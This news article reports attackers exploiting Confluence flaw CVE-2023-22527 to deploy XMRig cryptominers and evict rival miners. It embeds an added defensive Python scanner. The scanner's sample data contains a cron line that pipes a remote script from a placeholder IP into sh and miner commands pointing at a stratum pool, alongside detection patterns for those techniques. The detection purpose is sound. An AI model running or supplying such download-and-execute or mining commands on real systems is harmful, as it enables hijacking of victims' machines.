Atlassian Confluence Data Center and Confluence Server previously had a maximum severity vulnerability that allowed threat actors to remotely execute any malicious code.
Even though the solution has been available for months, there are many unprotected endpoints.
As a result, hackers have been observed installing cryptocurrency miners on these devices, leading to huge electricity bills for victims and rendering their devices virtually unusable.
Fight for control
This is according to a new report from cybersecurity researchers at Trend Micro, published earlier this week. The report claims that criminals are competing with each other, removing and installing cryptominers on a regular basis.
The vulnerability is known as CVE-2023-22527. It is a 10/10 severity critical flaw that allows remote code execution and was patched in mid-January of this year. However, since mid-June of this year, criminals have been scanning for vulnerable instances and deploying the XMRig miner where possible. XMRig is the most popular cryptocurrency miner out there and generates the Monero (XMR) cryptocurrency. Monero is described as a privacy coin as it is virtually untraceable.
“The attacks involve threat actors employing methods such as deploying shell scripts and XMRig miners, targeting SSH endpoints, killing competing cryptocurrency mining processes, and maintaining persistence via cron jobs,” said Trend Micro researcher Abdelrahman Esmail.
The part about “killing competing cryptocurrency mining processes” is particularly interesting. The researcher said there are at least three different actors fighting to maintain control over these endpoints. Once they compromise the device, they will use a shell script to terminate previous miners, delete all existing cron jobs, uninstall cloud security tools, and gather system information. After that, they will establish a channel with the C2 server and launch a new miner.
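The behaviour described above (cron-based persistence, remote scripts piped to a shell, XMRig miners pointed at mining pools, and scripts that kill rival miners) can be turned into a quick host triage check. The following is an added example, not code from the report or from Trend Micro; the indicator patterns are heuristics of my own, and the crontab and process listings, including the 203.0.113.10 address and port 3333, are constructed sample data.

```python
import re

# Constructed sample input, shaped like `crontab -l` and `ps -eo pid,user,args`
# output from a Confluence host under review. 203.0.113.0/24 is a documentation
# range, so nothing here points at a real pool or C2.
SAMPLE_CRON = [
    "0 * * * * /usr/bin/certbot renew --quiet",
    "*/5 * * * * curl -fsSL http://203.0.113.10/x.sh | sh",
    "@reboot /tmp/.cache/xmrig --url stratum+tcp://203.0.113.10:3333 -B",
]
SAMPLE_PS = [
    "   1 root       /sbin/init",
    "2213 confluence /opt/atlassian/confluence/jre/bin/java -Xms1024m",
    # A miner renamed to look like a kernel thread; the pool URL still gives it away.
    "4721 confluence /tmp/.cache/kworker -o stratum+tcp://203.0.113.10:3333 -k",
]

# Heuristic indicators (assumptions, not the report's own rules) matching the
# TTPs described: XMRig, stratum pool URLs, download-and-pipe-to-shell cron
# entries, and competitor-killing commands.
MINER_PATTERNS = [
    (re.compile(r"\bxmrig\b", re.I), "xmrig binary name"),
    (re.compile(r"stratum\+(tcp|ssl)://", re.I), "stratum mining pool URL"),
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"), "remote script piped to shell"),
    (re.compile(r"\b(pkill|killall)\b"), "kills other processes (competitor removal)"),
]


def scan_lines(lines, source):
    """Return one finding per (line, matched indicator) pair."""
    findings = []
    for line in lines:
        for pattern, reason in MINER_PATTERNS:
            if pattern.search(line):
                findings.append({"source": source, "reason": reason, "line": line.strip()})
    return findings


def scan_host(cron_lines, ps_lines):
    """Combine crontab and process-list findings for a single host."""
    return scan_lines(cron_lines, "crontab") + scan_lines(ps_lines, "ps")


if __name__ == "__main__":
    for f in scan_host(SAMPLE_CRON, SAMPLE_PS):
        print(f"[{f['source']}] {f['reason']}: {f['line']}")
```

On a live host, feed the function the real `crontab -l` (for every user) and `ps` output; a hit is a prompt to confirm the Confluence version is patched and to check for the cron and shell-script artefacts the report describes.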
“With its continued exploitation by threat actors, CVE-2023-22527 poses a significant security risk to organizations worldwide,” the researcher added. “To minimize the risks and threats associated with this vulnerability, administrators should update their Confluence Data Center and Confluence Server versions to the latest available versions as soon as possible.”
Via The Hacker News